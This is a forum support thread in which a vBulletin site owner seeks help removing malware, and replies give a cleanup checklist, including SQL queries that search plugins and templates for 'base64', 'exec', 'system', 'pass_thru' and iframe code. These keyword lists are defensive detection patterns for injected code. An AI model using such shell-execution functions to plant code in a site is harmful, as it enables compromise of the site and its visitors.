I have a malware!

it is not vb problem

So what's my problem? please, give me a solution

What exactly is happening, what is the URL to your forum?

If you enter with google chrome a alert message appear

I can look when I go home for lunch.. It looks like this site is blocked at my work.
Maybe a screenshot of the alert would help as well?

This malware seems to be present only in the cms, in forum and blog will not get the message alert.

how can I remove this malware?

LOL! I often wonder why people even offer to reply if there replies are like that.

Here is a screener of the detections i got when visiting your site.



Had anything changed on your site in recent days apart from the upgrade?
Added mods or anything like that?

If you're running it, it's a vBSEO script injection vulnerability. Patch available on their site.

Very helpful...

To check a site for compromises follow these steps:

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

If you a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

7) Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

8) Check .htaccess to make sure there are no redirects there.

9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.

Grazie! Thank you for help me, seems that malware was deleted forever

HEEELLLPPP!!! this is a nightmare! malware is still on the site, I do not know anymore what to do...

I change the server password, Run Suspect File Diagnostics, delete suspicious file...

Please help me

If you have installed vbSEO then apply the patch available from them. Read the thread on these topics @vbseo.com:


Check if the plugins that are listed in the vbseo.com thread have been added to your system.

If you have installed vbadvanced, upgrade to the latest version.


Remove all instances of this from your database:
Change all passwords and secure your non-public directories. Scan your computers for infection.

Update all addons and vbulletin to the latest version.

I would do all of what Trevor suggested and also what Alfa suggested.
It appears you were able to get rid of it temperarely so its quite possible you have some outdated mod or other vulnerability we dont have.
Thats why it come back. I see your site is now listed as below.

This web page at www.retrogaminghistory.com has been reported as an attack page and has been blocked based on your security preferences.

Perhaps you should disable all mods and start there?

I have a malware!

Make sure you have got a good quality anti virus software installed on your pc. It will prevent viruses and malware from hitting your computer.